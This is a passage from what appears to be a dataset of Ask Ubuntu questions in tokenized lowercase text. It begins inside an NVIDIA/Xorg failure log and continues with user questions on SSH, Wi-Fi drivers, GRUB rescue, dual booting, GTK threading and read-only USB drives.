minor number 0 jan 22 16:17:50 io kernel : [ 159.703165 ] nvrm : nvidia_frontend_open : minor 0 , module- > open ( ) failed , error -5 jan 22 16:19:25 io kernel : [ 253.931260 ] nvidia 0000:01:00.0 : irq 51 for msi/msi-x jan 22 16:19:25 io kernel : [ 253.936524 ] nvrm : failed to copy vbios to system memory . jan 22 16:19:25 io kernel : [ 253.938816 ] nvrm : rminitadapter failed ! ( 0x30:0xffffffff:720 ) jan 22 16:19:25 io kernel : [ 253.938822 ] nvrm : rm_init_adapter failed for device bearing minor number 0 jan 22 16:19:25 io kernel : [ 253.938840 ] nvrm : nvidia_frontend_open : minor 0 , module- > open ( ) failed , error -5 xorg.8.log [ 253.727 ] x.org x server 1.14.5 release date : 2013-12-12 [ 253.727 ] x protocol version 11 , revision 0 [ 253.727 ] build operating system : linux 3.2.0-54-generic x86_64 ubuntu [ 253.727 ] current operating system : linux io 3.13.0-4-generic # 19-ubuntu smp thu jan 16 18:10:11 utc 2014 x86_64 [ 253.727 ] kernel command line : boot_image=/boot/vmlinuz-3.13.0-4-generic.efi.signed root=uuid=5b9b1a5b-a812-4478-9e57-49679c2d4cfa ro acpi=force quiet splash vt.handoff=7 [ 253.727 ] build date : 15 december 2013 09:53:45pm [ 253.727 ] xorg-server 2:1.14.5-1ubuntu2 ( for technical support please see http : //www.ubuntu.com/support ) [ 253.727 ] current version of pixman : 0.30.2 [ 253.727 ] before reporting problems , check http : //wiki.x.org to make sure that you have the latest version . [ 253.727 ] markers : ( -- ) probed , ( ** ) from config file , ( == ) default setting , ( ++ ) from command line , ( ! ! ) notice , ( ii ) informational , ( ww ) warning , ( ee ) error , ( ni ) not implemented , ( ? ? ) unknown . [ 253.727 ] ( == ) log file : `` /var/log/xorg.8.log '' , time : wed jan 22 16:19:24 2014 [ 253.728 ] ( ++ ) using config file : `` /etc/bumblebee/xorg.conf.nvidia '' [ 253.728 ] ( ++ ) using config directory : `` /etc/bumblebee/xorg.conf.d '' [ 253.728 ] ( == ) using system config directory `` /usr/share/x11/xorg.conf.d '' [ 253.728 ] ( == ) serverlayout `` layout0 '' [ 253.728 ] ( ** ) | -- > screen `` default screen '' ( 0 ) [ 253.728 ] ( ** ) | | -- > monitor `` configured monitor '' [ 253.729 ] ( ** ) | | -- > device `` configured video device '' [ 253.729 ] ( ** ) option `` autoadddevices '' `` false '' [ 253.729 ] ( ** ) option `` autoaddgpu '' `` false '' [ 253.729 ] ( ** ) not automatically adding devices [ 253.729 ] ( == ) automatically enabling devices [ 253.729 ] ( ** ) not automatically adding gpu devices [ 253.729 ] ( ww ) the directory `` /usr/share/fonts/x11/cyrillic '' does not exist . [ 253.729 ] entry deleted from font path . [ 253.729 ] ( ww ) the directory `` /usr/share/fonts/x11/100dpi/ '' does not exist . [ 253.729 ] entry deleted from font path . [ 253.729 ] ( ww ) the directory `` /usr/share/fonts/x11/75dpi/ '' does not exist . [ 253.729 ] entry deleted from font path . [ 253.729 ] ( ww ) the directory `` /usr/share/fonts/x11/100dpi '' does not exist . [ 253.729 ] entry deleted from font path . [ 253.729 ] ( ww ) the directory `` /usr/share/fonts/x11/75dpi '' does not exist . [ 253.729 ] entry deleted from font path . [ 253.729 ] ( == ) fontpath set to : /usr/share/fonts/x11/misc , /usr/share/fonts/x11/type1 , built-ins [ 253.729 ] ( ++ ) modulepath set to `` /usr/lib/nvidia-331/xorg , /usr/lib/xorg/modules '' [ 253.729 ] ( == ) | -- > input device `` < default pointer > '' [ 253.729 ] ( == ) | -- > input device `` < default keyboard > '' [ 253.729 ] ( == ) the core pointer device was n't specified explicitly in the layout . using the default mouse configuration . [ 253.729 ] ( == ) the core keyboard device was n't specified explicitly in the layout . using the default keyboard configuration . [ 253.729 ] ( ii ) loader magic : 0x7f0ec6fc3d20 [ 253.729 ] ( ii ) module abi versions : [ 253.729 ] x.org ansi c emulation : 0.4 [ 253.729 ] x.org video driver : 14.1 [ 253.729 ] x.org xinput driver : 19.1 [ 253.729 ] x.org server extension : 7.0 [ 253.730 ] ( ii ) xfree86 : adding drm device ( /dev/dri/card1 ) [ 253.730 ] ( ii ) xfree86 : adding drm device ( /dev/dri/card0 ) [ 253.730 ] setversion 1.4 failed [ 253.730 ] ( ii ) config/udev : ignoring already known drm device ( /dev/dri/card0 ) [ 253.732 ] ( -- ) pci : * ( 0:1:0:0 ) 10de:0fcd:17aa:3801 rev 161 , mem @ 0xc0000000/16777216 , 0x90000000/268435456 , 0xa0000000/33554432 , i/o @ 0x00004000/128 , bios @ 0x ? ? ? ? ? ? ? ? /524288 [ 253.732 ] ( ii ) open acpi successful ( /var/run/acpid.socket ) [ 253.732 ] initializing built-in extension generic event extension [ 253.732 ] initializing built-in extension shape [ 253.732 ] initializing built-in extension mit-shm [ 253.732 ] initializing built-in extension xinputextension [ 253.732 ] initializing built-in extension xtest [ 253.732 ] initializing built-in extension big-requests [ 253.732 ] initializing built-in extension sync [ 253.732 ] initializing built-in extension xkeyboard [ 253.732 ] initializing built-in extension xc-misc [ 253.732 ] initializing built-in extension security [ 253.732 ] initializing built-in extension xinerama [ 253.732 ] initializing built-in extension xfixes [ 253.732 ] initializing built-in extension render [ 253.732 ] initializing built-in extension randr [ 253.732 ] initializing built-in extension composite [ 253.732 ] initializing built-in extension damage [ 253.732 ] initializing built-in extension mit-screen-saver [ 253.732 ] initializing built-in extension double-buffer [ 253.732 ] initializing built-in extension record [ 253.732 ] initializing built-in extension dpms [ 253.732 ] initializing built-in extension x-resource [ 253.732 ] initializing built-in extension xvideo [ 253.732 ] initializing built-in extension xvideo-motioncompensation [ 253.732 ] initializing built-in extension selinux [ 253.732 ] initializing built-in extension xfree86-vidmodeextension [ 253.732 ] initializing built-in extension xfree86-dga [ 253.732 ] initializing built-in extension xfree86-dri [ 253.732 ] initializing built-in extension dri2 [ 253.732 ] ( ww ) `` glamoregl '' will not be loaded unless you 've specified it to be loaded elsewhere . [ 253.732 ] ( ii ) `` glx '' will be loaded by default . [ 253.732 ] ( ww ) `` xmir '' is not to be loaded by default . skipping . [ 253.732 ] ( ii ) loadmodule : `` glx '' [ 253.733 ] ( ii ) loading /usr/lib/nvidia-331/xorg/libglx.so [ 253.751 ] ( ii ) module glx : vendor= '' nvidia corporation '' [ 253.751 ] compiled for 4.0.2 , module version = 1.0.0 [ 253.751 ] module class : x.org server extension [ 253.751 ] ( ii ) nvidia glx module 331.38 wed jan 8 19:10:17 pst 2014 [ 253.751 ] loading extension glx [ 253.751 ] ( == ) matched nvidia as autoconfigured driver 0 [ 253.751 ] ( == ) matched nouveau as autoconfigured driver 1 [ 253.751 ] ( == ) matched nvidia as autoconfigured driver 2 [ 253.751 ] ( == ) matched nouveau as autoconfigured driver 3 [ 253.751 ] ( == ) matched vesa as autoconfigured driver 4 [ 253.751 ] ( == ) matched modesetting as autoconfigured driver 5 [ 253.751 ] ( == ) matched fbdev as autoconfigured driver 6 [ 253.752 ] ( == ) assigned the driver to the xf86configlayout [ 253.752 ] ( ii ) loadmodule : `` nvidia '' [ 253.752 ] ( ii ) loading /usr/lib/nvidia-331/xorg/nvidia_drv.so [ 253.752 ] ( ii ) module nvidia : vendor= '' nvidia corporation '' [ 253.752 ] compiled for 4.0.2 , module version = 1.0.0 [ 253.752 ] module class : x.org video driver [ 253.752 ] ( ii ) loadmodule : `` nouveau '' [ 253.752 ] ( ii ) loading /usr/lib/xorg/modules/drivers/nouveau_drv.so [ 253.752 ] ( ii ) module nouveau : vendor= '' x.org foundation '' [ 253.752 ] compiled for 1.14.3 , module version = 1.0.10 [ 253.752 ] module class : x.org video driver [ 253.752 ] abi class : x.org video driver , version 14.1 [ 253.752 ] ( ii ) loadmodule : `` vesa '' [ 253.752 ] ( ii ) loading /usr/lib/xorg/modules/drivers/vesa_drv.so [ 253.752 ] ( ii ) module vesa : vendor= '' x.org foundation '' [ 253.752 ] compiled for 1.14.3 , module version = 2.3.3 [ 253.752 ] module class : x.org video driver [ 253.752 ] abi class : x.org video driver , version 14.1 [ 253.752 ] ( ii ) loadmodule : `` modesetting '' [ 253.752 ] ( ii ) loading /usr/lib/xorg/modules/drivers/modesetting_drv.so [ 253.752 ] ( ii ) module modesetting : vendor= '' x.org foundation '' [ 253.752 ] compiled for 1.14.3 , module version = 0.8.1 [ 253.752 ] module class : x.org video driver [ 253.752 ] abi class : x.org video driver , version 14.1 [ 253.752 ] ( ii ) loadmodule : `` fbdev '' [ 253.753 ] ( ii ) loading /usr/lib/xorg/modules/drivers/fbdev_drv.so [ 253.753 ] ( ii ) module fbdev : vendor= '' x.org foundation '' [ 253.753 ] compiled for 1.14.5 , module version = 0.4.4 [ 253.753 ] module class : x.org video driver [ 253.753 ] abi class : x.org video driver , version 14.1 [ 253.753 ] ( ii ) loadmodule : `` mouse '' [ 253.753 ] ( ii ) loading /usr/lib/xorg/modules/input/mouse_drv.so [ 253.753 ] ( ii ) module mouse : vendor= '' x.org foundation '' [ 253.753 ] compiled for 1.14.3 , module version = 1.9.0 [ 253.753 ] module class : x.org xinput driver [ 253.753 ] abi class : x.org xinput driver , version 19.1 [ 253.753 ] ( ii ) loadmodule : `` kbd '' [ 253.753 ] ( ww ) warning , could n't open module kbd [ 253.753 ] ( ii ) unloadmodule : `` kbd '' [ 253.753 ] ( ii ) unloading kbd [ 253.753 ] ( ee ) failed to load module `` kbd '' ( module does not exist , 0 ) [ 253.753 ] ( ii ) nvidia dlloader x driver 331.38 wed jan 8 18:51:00 pst 2014 [ 253.753 ] ( ii ) nvidia unified driver for all supported nvidia gpus [ 253.753 ] ( ii ) nouveau driver date : thu nov 7 14:56:48 2013 +1000 [ 253.753 ] ( ii ) nouveau driver for nvidia chipset families : [ 253.753 ] riva tnt ( nv04 ) [ 253.753 ] riva tnt2 ( nv05 ) [ 253.753 ] geforce 256 ( nv10 ) [ 253.753 ] geforce 2 ( nv11 , nv15 ) [ 253.753 ] geforce 4mx ( nv17 , nv18 ) [ 253.753 ] geforce 3 ( nv20 ) [ 253.753 ] geforce 4ti ( nv25 , nv28 ) [ 253.753 ] geforce fx ( nv3x ) [ 253.753 ] geforce 6 ( nv4x ) [ 253.753 ] geforce 7 ( g7x ) [ 253.753 ] geforce 8 ( g8x ) [ 253.753 ] geforce gtx 200 ( nva0 ) [ 253.753 ] geforce gtx 400 ( nvc0 ) [ 253.753 ] ( ii ) vesa : driver for vesa chipsets : vesa [ 253.753 ] ( ii ) modesetting : driver for modesetting kernel drivers : kms [ 253.753 ] ( ii ) fbdev : driver for framebuffer : fbdev [ 253.753 ] ( -- ) using vt number 7 [ 253.753 ] ( ii ) loading sub module `` fb '' [ 253.753 ] ( ii ) loadmodule : `` fb '' [ 253.753 ] ( ii ) loading /usr/lib/xorg/modules/libfb.so [ 253.754 ] ( ii ) module fb : vendor= '' x.org foundation '' [ 253.754 ] compiled for 1.14.5 , module version = 1.0.0 [ 253.754 ] abi class : x.org ansi c emulation , version 0.4 [ 253.754 ] ( ww ) unresolved symbol : fbgetgcprivatekey [ 253.754 ] ( ii ) loading sub module `` wfb '' [ 253.754 ] ( ii ) loadmodule : `` wfb '' [ 253.754 ] ( ii ) loading /usr/lib/xorg/modules/libwfb.so [ 253.754 ] ( ii ) module wfb : vendor= '' x.org foundation '' [ 253.754 ] compiled for 1.14.5 , module version = 1.0.0 [ 253.754 ] abi class : x.org ansi c emulation , version 0.4 [ 253.754 ] ( ii ) loading sub module `` ramdac '' [ 253.754 ] ( ii ) loadmodule : `` ramdac '' [ 253.754 ] ( ii ) module `` ramdac '' already built-in [ 253.754 ] ( ww ) falling back to old probe method for vesa [ 253.754 ] ( ww ) falling back to old probe method for modesetting [ 253.754 ] ( ww ) falling back to old probe method for fbdev [ 253.754 ] ( ii ) loading sub module `` fbdevhw '' [ 253.754 ] ( ii ) loadmodule : `` fbdevhw '' [ 253.754 ] ( ii ) loading /usr/lib/xorg/modules/libfbdevhw.so [ 253.754 ] ( ii ) module fbdevhw : vendor= '' x.org foundation '' [ 253.754 ] compiled for 1.14.5 , module version = 0.0.2 [ 253.754 ] abi class : x.org video driver , version 14.1 [ 253.754 ] ( ii ) nvidia ( 0 ) : creating default display subsection in screen section `` default screen '' for depth/fbbpp 24/32 [ 253.754 ] ( == ) nvidia ( 0 ) : depth 24 , ( == ) framebuffer bpp 32 [ 253.754 ] ( == ) nvidia ( 0 ) : rgb weight 888 [ 253.754 ] ( == ) nvidia ( 0 ) : default visual is truecolor [ 253.754 ] ( == ) nvidia ( 0 ) : using gamma correction ( 1.0 , 1.0 , 1.0 ) [ 253.754 ] ( ** ) nvidia ( 0 ) : enabling 2d acceleration [ 253.762 ] ( ee ) nvidia ( gpu-0 ) : failed to initialize the nvidia gpu at pci:1:0:0 . please [ 253.762 ] ( ee ) nvidia ( gpu-0 ) : check your system 's kernel log for additional error [ 253.762 ] ( ee ) nvidia ( gpu-0 ) : messages and refer to chapter 8 : common problems in the [ 253.762 ] ( ee ) nvidia ( gpu-0 ) : readme for additional information . [ 253.762 ] ( ee ) nvidia ( gpu-0 ) : failed to initialize the nvidia graphics device ! [ 253.762 ] ( ee ) nvidia ( 0 ) : failing initialization of x screen 0 [ 253.762 ] ( ii ) unloadmodule : `` nvidia '' [ 253.762 ] ( ii ) unloadsubmodule : `` wfbs '' [ 253.762 ] ( ii ) unloadsubmodule : `` fb '' [ 253.762 ] ( ee ) screen ( s ) found , but none have a usable configuration . [ 253.762 ] ( ee ) fatal server error : [ 253.762 ] ( ee ) no screens found ( ee ) [ 253.762 ] ( ee ) please consult the the x.org foundation support at http : //wiki.x.org for help . [ 253.762 ] ( ee ) please also check the log file at `` /var/log/xorg.8.log '' for additional information . [ 253.762 ] ( ee ) [ 253.762 ] ( ee ) server terminated with error ( 1 ) . closing log file .
409466	why ca n't i ssh to local server via ubuntu but can with other os	i set up a remote , headless linux server . fresh install . have done nothing but configure the keyboard layout enable ssh and set up my password . when i try to connect to the server , i 'm getting this error : ssh : connect to host [ ip address ] port 22 : no route to host my research so far suggests it may be a remote issue . i 'm connecting locally though , and have no problems using the same syntax and connecting to the server from a mac . so it seems the problem is this machine right ? i 've even turned off the local firewall , and i 'm still getting this error . how would i be able to connect using a mac terminal and not linux terminal ? this is the syntax i am using : ssh [ username ] @ [ ip address ] . on the mac , i get the expected password prompt . on my ubuntu box i 'm getting the error .
409468	can not connect to 2-wire wifi network	i just got a new linux tower with a wireless card . it fails to connect to my 2wire 2701hg-b . i 'm new to ubuntu but not linux . i 'm currently connected with a direct wire . i appreciate any help someone could give to me . when i perform sudo lshw -c network i get the following information *-network description : ethernet interface product : 82579v gigabit network connection vendor : intel corporation physical id : 19 bus info : pci @ 0000:00:19.0 logical name : eth0 version : 06 serial : bc : ee:7b:98 : e4 : fe size : 100mbit/s capacity : 1gbit/s width : 32 bits clock : 33mhz capabilities : pm msi bus_master cap_list ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=e1000e driverversion=2.3.2-k duplex=full firmware=0.13-4 ip=192.168.1.66 latency=0 link=yes multicast=yes port=twisted pair speed=100mbit/s resources : irq:80 memory : fb600000-fb61ffff memory : fb628000-fb628fff ioport : f040 ( size=32 ) *-network description : wireless interface product : rtl8188ce 802.11b/g/n wifi adapter vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:0a:00.0 logical name : wlan0 version : 01 serial : 74 : d0:2b:3c : ef : d6 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=rtl8192ce driverversion=3.11.0-15-generic firmware=n/a latency=0 link=no multicast=yes wireless=ieee 802.11bgn resources : irq:19 ioport : b000 ( size=256 ) memory : fb100000-fb103fff when i look at /etc/modprobe.d/iwlwifi.conf file i see # /etc/modprobe.d/iwlwifi.conf # iwlwifi will dyamically load either iwldvm or iwlmvm depending on the # microcode file installed on the system . when removing iwlwifi , first # remove the iwl ? vm module and then iwlwifi . remove iwlwifi \ ( /sbin/lsmod | grep -o -e ^iwlmvm -e ^iwldvm -e ^iwlwifi | xargs /sbin/rmmod ) \ & & /sbin/modprobe -r mac80211
409469	host purchased domain name in apache2 ubuntu server	i have been looking for a solution to this for months with no luck so here goes . i installed the ubuntu server 13.04 ( since upgraded to 13.10 ) on an old dell e510 and installed apache2 . also i purchased a domain name from godaddy . i can not find/figure out how to host that website from my server . any help would be greatly appreciated !
409472	garmin poi loader	has anyone loaded the garmin poi loader ? when i go to their website there are downloads for windows and apple , but not for ubuntu . i have version 13.10 and i am not as good at this stuff as some whose questions and answers i have read and mostly not understood !
409474	removing ubuntu and installing centos	i currently have a dual boot acer laptop running windows 8 and ubuntu . i want to remove ubuntu 13.10 and install centos on that partition instead . what 's the safest and best way to remove it ? i still want to keep my windows 8 . will grub be automatically working after i install centos ?
409476	installing drivers for ati radeon r7 240	i recently bought a new system , dell with intel® core™2 cpu 6700 @ 2.66ghz × 2 processor , 2g ram , hdd , etc , but no graphics . to save on money i skipped gettiing a windows key and went with ubuntu 12.04 lts . i bought videocard online , an xfx amd/ati radeon r7 240 with 2gb of onboard ram . twice now ive tried to install the drivers for it , once direct download from their website and executeing that way , which gave me some sort of error . then i tried sudo apt-get install fglrx fglrx-amdcccle , which also failed . . heres what i get under graphics when i type lspci -v : 01:00.0 vga compatible controller : advanced micro devices , inc. [ amd/ati ] oland [ radeon hd 8500 series ] ( prog-if 00 [ vga controller ] ) subsystem : xfx pine group inc. device 7240 flags : fast devsel , irq 11 memory at c0000000 ( 64-bit , prefetchable ) [ size=256m ] memory at dfdc0000 ( 64-bit , non-prefetchable ) [ size=256k ] i/o ports at dc00 [ size=256 ] expansion rom at dfe00000 [ disabled ] [ size=128k ] capabilities : < access denied > whats going wrong here ? im really fustrated cause like 3 days ago i did something and it worked awesome and i even got to where i had fallout new vegas installed and running and running well and i clicked something in compiz and lost my top menu bar and launcher menu and all hotkeys > . < not downloading compiz again for a while . anyway anybody been through this ? probably final edit : ok so i went through several other distros booting from live usb and attempting to install , but they all fail at some point , usually around graphics stuff . guess i should have considered getting the newer edition of something with proprititary drivers . anyway im pretty sure each attempt broke something different so i found an iso for the xp version that i have the key for stickered to the top of the machine , gon na try and dual boot fresh . ty for the part about the headers , i remember skimming over something about them once , and then ignoring it . that was probably my issue
409478	uninstalled through the windows 8 'programs and features ' but ubuntu	i 've recently uninstalled ubuntu desktop 12.04 that i had downloaded . i uninstalled it through the programs and features of windows 8 . one problem i forgot to manage was that ubuntu had created partitions in the windows8_os ( c : ) and when i uninstalled ubuntu , the partitions did not uninstall along with it . now most of the space is taken up and i 'm not sure whether or not is my files or ubuntu 's partition ? ? i found this link ( http : //www.wikihow.com/erase-ubuntu ) and i thought it could help but i do n't seem to have healthy ( unknown partition ) . could this mean that i has possibly uninstalled ubuntu along with its partition ? ? can someone help me please and explain in-depth would be nice . ps : it was meant to be dual boot alongside with windows 8 .
409481	user privileges	i have certain files and folders whose read , write , execute privileges i want to keep locked for certain users . i can use chmod xxx < filepath > for locking file privileges , but the user can certainly delete that file , although he can not access it . is there a way to prevent him from doing so ? plus will that work on folders too ?
409486	my computer is really hot	i 've been dual booting for a week and when i installed the package lm-sensors , i noticed my pc is running at 60 -67 * c , how do i get it to run at a bearable rate ?
409487	unable to install canon lbp2900 printer with cd or from download	i 'm using ubuntu 12.04 , i try to install canon lbp2900 printer from cd , but no use , and i try install from some driver links , no use , what to do ? how to install from cd ? i 'd like clear steps .
409488	problem installing mobile partner driver	while installing mobile partner i got error saying ndis driver failed so because of that i followed this link and according to that i changed my hw_cdc_driver.c file and while installing driver i 'm getting error what is the solution for this problem < cp : can not stat ‘/driver/64bit/hwactivator’ : no such file or directory chmod : can not access ‘/driver/hwactivator’ : no such file or directory sed : ca n't read /driver/10-huawei-datacard.rules : no such file or directory ./install : line 48 : /driver/ndis_driver/ndis_install : no such file or directory ./install : line 50 : /driver/patch/patch_install : no such file or directory cp : can not stat ‘/driver/huaweiautostart.desktop’ : no such file or directory ./install : line 64 : /driver/uninstall : no such file or directory ./install : line 89 : /driver/skeleton.bak : no such file or directory ./install : line 91 : /driver/runhwactivator : no such file or directory cp : can not stat ‘/driver/runhwactivator’ : no such file or directory ./install : line 109 : /driver/uninstall : no such file or directory addrunlevel=/etc/rc5.d ‘/etc/rc5.d/s99runhwactivator’ - > ‘/etc/init.d/runhwactivator’ ‘/etc/rc5.d/k10runhwactivator’ - > ‘/etc/init.d/runhwactivator’ ./install : line 125 : /driver/uninstall : no such file or directory ./install : line 126 : /driver/uninstall : no such file or directory addrunlevel=/etc/rc3.d ‘/etc/rc3.d/s99runhwactivator’ - > ‘/etc/init.d/runhwactivator’ ‘/etc/rc3.d/k10runhwactivator’ - > ‘/etc/init.d/runhwactivator’ ./install : line 125 : /driver/uninstall : no such file or directory ./install : line 126 : /driver/uninstall : no such file or directory addrunlevel=/etc/rc2.d ‘/etc/rc2.d/s99runhwactivator’ - > ‘/etc/init.d/runhwactivator’ ‘/etc/rc2.d/k10runhwactivator’ - > ‘/etc/init.d/runhwactivator’ ./install : line 125 : /driver/uninstall : no such file or directory ./install : line 126 : /driver/uninstall : no such file or directory addrunlevel=/etc/rc4.d ‘/etc/rc4.d/s99runhwactivator’ - > ‘/etc/init.d/runhwactivator’ ‘/etc/rc4.d/k10runhwactivator’ - > ‘/etc/init.d/runhwactivator’ ./install : line 125 : /driver/uninstall : no such file or directory ./install : line 126 : /driver/uninstall : no such file or directory ./install : line 137 : /driver/sleep-settings.sh : no such file or directory cp : can not stat ‘/driver/usbmod’ : no such file or directory cp : can not stat ‘/driver/startmobilepartner’ : no such file or directory ./install : line 145 : /driver/uninstall : no such file or directory ./install : line 146 : /driver/uninstall : no such file or directory
409490	what is the real benefit of using uuids ?	i have always seen people discuss using uuids in hard drives instead of /dev/sdn . what is the real benefit of using a uuid ? is it faster , more reliable , easier to remember ( ha lol no ) , what ? and , is n't it possible to change a uuid ? is there a way to identify a drive ( especially in grub ) that can never change ?
409498	lenovo z510 ubuntu black scrren	i just upgraded my laptop to a lenovo z510 with windows 8.1 and i tried to install ubuntu 13.10 on it via usb . to test if everything works okay i decided to boot into it live . however every time i boot into it live or just try to install it i get a black screen but i can hear the login sound aka the drums . i know installing ubuntu with windows 8 is tricky so i read up on some guides that told me to disable windows fast boot and safe boot . is this problem common with windows 8 and ubuntu ? did i miss and step , am i doing something wrong ? edit : i have tried ubuntu a distribution one my pc that worked fine except for the wireless drivers ( elementary os ) . another edit : i have used other ubuntu version to the same result ( 13.04 ) . note : i 'm extremely new to linux so try to keep it simple ( i started yesterday ) :3 specs : intel速 celeron速 2950m ( 2.0ghz 1600mhz 2mb ) intel速 hd graphics 4000 intel centrino wireless n-2230 windows 8.1 64
409499	multi-threading in gtk python	i 'm trying to display a gui and do some work in the background.when the window is current window , gui runs normally . long after minimizing the window , gui will freeze . the following code is created with anjuta , the problem also exists . how to resolve it ? from gi.repository import gtk , gdkpixbuf , gdk , gobject import os , sys , time , threading gobject.threads_init ( ) ui_file = `` src/multi_threading.ui '' class gui : def __init__ ( self ) : self.builder = gtk.builder ( ) self.builder.add_from_file ( ui_file ) self.builder.connect_signals ( self ) window = self.builder.get_object ( 'window ' ) self.label = self.builder.get_object ( 'label1 ' ) self.togglebutton = self.builder.get_object ( 'togglebutton1 ' ) self.adjustment = gtk.adjustment ( 0,0,59,1,10,0 ) self.spinbutton = self.builder.get_object ( 'spinbutton1 ' ) self.spinbutton.set_adjustment ( self.adjustment ) window.show_all ( ) def on_spinbutton1_change_value ( self , spinbutton ) : pass def on_togglebutton1_toggled ( self , togglebutton ) : gobject.idle_add ( self.func ) def func ( self ) : interval = self.spinbutton.get_value ( ) if self.togglebutton.get_active ( ) : self.label.set_label ( `` 现在时刻： '' +time.ctime ( ) [ 11:19 ] ) threading.timer ( interval , self.func ) .start ( ) def destroy ( window , self ) : gtk.main_quit ( ) def main ( ) : app = gui ( ) gtk.main ( ) if __name__ == `` __main ( ) __ '' : sys.exit ( main ( ) )
409505	multiple ubuntu workstations running windows applications	i would like to achieve something like this . multiple ubuntu 12.x unity workstations can simultaneously access centralized server where they could work on windows application . let 's say adobe photoshop cc ( cloud ) . let 's not focus now on licensing . of course you could use vnc , rdp , wine or codeweaver but some latest apps wont work . so i would like to allow 2-3 users to use let 's say the same application at the same time . what i would need to build to make it running ? thanks .
409508	unable to boot after installing xfce and removing unity	the system starts , but it never gets to the login screen . is there any way that i can get the system to get to the login screen ?
409511	problems with xorg since the new upgrade to 13.10	receiving error everytime i ctrl + alt + f1 to access cmd line/terminal . recently i updated to ubuntu 13.10 and it was around this time that i started receiving errors with the xorg . the error i am receiving is : '' the xkeyboard keymap compiler ( xkbcomp ) reports warnings compat map for group 2 redifined using new definition ( ii ) suspending aiglx clietns for vt switch '' and then it pretty much just stays in that screen until press ctrl - c , or reboot or something . i am not sure if that is enough information , i am sort of new to these forums .
409512	dual booting windows server 2012 and ubuntu server 12.04	i am new to in ubuntu installation i am trying to dual booting windows server 2012 and ubuntu server 12.04 . i seen a tutorials from youtube and i tried those tutorial in hyper-v vm and successfully installed dual boot 2 times . but , when i tried it on physical systems i got problem when i left a free space for ubuntu installation and during installation i am chose largest free contiguous location ubuntu does not recognizes free space i left , instead ubuntu recognize my whole disk as free space . ubuntu should recognize free space other than windows drives . finally ubuntu making partition by considering my whole disk as free . my configuration is 1tb hdd and 16gb ram . thanks in advance any help will great .
409513	burg - cant boot computer because of burg ( please help ! ! )	so i am very new to this , i installed zorin 7 on my laptop and it works amazing , however after installing burg and grub i get this weird message and i can not boot my computer without a special disk ( made by a knowledgeable fellow at discount electronics , which i believe has the correct burg installed , which is what allows it to boot , i believe . ) i attached a picture of the message i get when i try to boot my computer without this disk and i have yet to see this anywhere else on the web . please please help me out with this asap people , i ca n't stand this . i would like to just completely remove burg and grub if possible or if not i would at least like to have this booting problem gone forever , so please help me out here . apparently i ca n't attach a picture without `` 10 reputation '' ? ? ? ? ?
409515	guake ocassionaly changes my active virtual desktop while toggled	i use guake on ubuntu 12.04 . sometimes ( not every time when toggled ! ) when i toggle guake it does a weird thing - it switches the background to the other virtual desktop ( like it would be if i pressed ctrl+alt+right ) . i 've obscured this bug on two different computers . btw , i 've made a change in the source code of guake to make it run on the last monitor and not first when multiple monitors are attached . i include the source code diff here . guake.py:810 ( get_final_window_rect ) # get the rectangle just from the first/default monitor in the # future we might create a field to select which monitor you # wan na use # add option to open guake window on the right monitor of two # 0 - left , 1 - right monitor_id_to_display = screen.get_n_monitors ( ) - 1 window_rect = screen.get_monitor_geometry ( monitor_id_to_display ) total_width = window_rect.width window_rect.height = window_rect.height * height / 100 window_rect.width = window_rect.width * width / 100 if width < total_width : if halignment == align_center : window_rect.x = ( total_width - window_rect.width ) / 2 elif halignment == align_left : window_rect.x = 0 elif halignment == align_right : window_rect.x = total_width - window_rect.width if monitor_id_to_display == 1 : window_rect.x += screen.get_monitor_geometry ( 0 ) .width window_rect.y = screen.get_monitor_geometry ( monitor_id_to_display ) .y return window_rect maybe this code has some side effects which i did n't notice ? i do n't get it .
409518	how do i do a grub resuce ?	i 've had a problem with hdd space , as detailed here : no hdd space left i 've since tried to make more space using gparted . i 've deleted partitions i thought were not being used , and expanded my ubuntu partion . so my partitions are 1 . dell 2 . os recovery 3 . windows 4 . ubuntu five and six were other things i did n't know , and there was some unallocated space . a long time ago i tried to expand ubuntu backwards to take up windows territory , but it could n't be done . so today i thought i 'd try the other direction . now i get this message after restarting : error : no such partiion . grub rescue > how do i rescue grub ? i have 12.04 on usb to use for gparted . system : dell latitude e5520 , windows 7 , ubuntu 12.04 lts , total drive space was 300gb , with about 200gb free space in windows , but could not use for ubuntu .
409519	how can to configure isa server on ubuntu server 12.04 ?	can someone tell me what are the procedure or steps for configuring isa server under ubuntu server ?
409520	unable to open /dev/sdb read-write ( read-only file system ) [ solved ]	as in the title , i 'm unable to format it as it says read-only . i 've tried couple of searches and the solutions too . even i tried gparted to see i have any luck . unfortunately below is what i get . gparted 0.11.0 -- enable-libparted-dmraid libparted 2.3 delete /dev/sdb1 ( fat32 , 14.91 gib ) from /dev/sdb 00:00:00 ( error ) calibrate /dev/sdb1 00:00:00 ( success ) path : /dev/sdb1 start : 32 end : 31,266,815 size : 31,266,784 ( 14.91 gib ) delete partition 00:00:00 ( error ) libparted messages ( info ) unable to open /dev/sdb read-write ( read-only file system ) . /dev/sdb has been opened read-only . unable to open /dev/sdb read-write ( read-only file system ) . /dev/sdb has been opened read-only . unable to open /dev/sdb read-write ( read-only file system ) . /dev/sdb has been opened read-only . unable to open /dev/sdb read-write ( read-only file system ) . /dev/sdb has been opened read-only . unable to open /dev/sdb read-write ( read-only file system ) . /dev/sdb has been opened read-only . ca n't write to /dev/sdb , because it is opened read-only . unable to open /dev/sdb read-write ( read-only file system ) . /dev/sdb has been opened read-only . output of dmesg [ 10061.878073 ] usb 2-1.3 : new high-speed usb device number 8 using ehci_hcd [ 10061.972140 ] scsi9 : usb-storage 2-1.3:1.0 [ 10062.969922 ] scsi 9:0:0:0 : direct-access sandisk cruzer blade 1.20 pq : 0 ansi : 5 [ 10062.971746 ] sd 9:0:0:0 : attached scsi generic sg2 type 0 [ 10062.972799 ] sd 9:0:0:0 : [ sdb ] 31266816 512-byte logical blocks : ( 16.0 gb/14.9 gib ) [ 10062.976439 ] sd 9:0:0:0 : [ sdb ] write protect is on [ 10062.976453 ] sd 9:0:0:0 : [ sdb ] mode sense : 43 00 80 00 [ 10062.977353 ] sd 9:0:0:0 : [ sdb ] write cache : disabled , read cache : enabled , does n't support dpo or fua [ 10062.999026 ] sdb : sdb1 [ 10063.003367 ] sd 9:0:0:0 : [ sdb ] attached 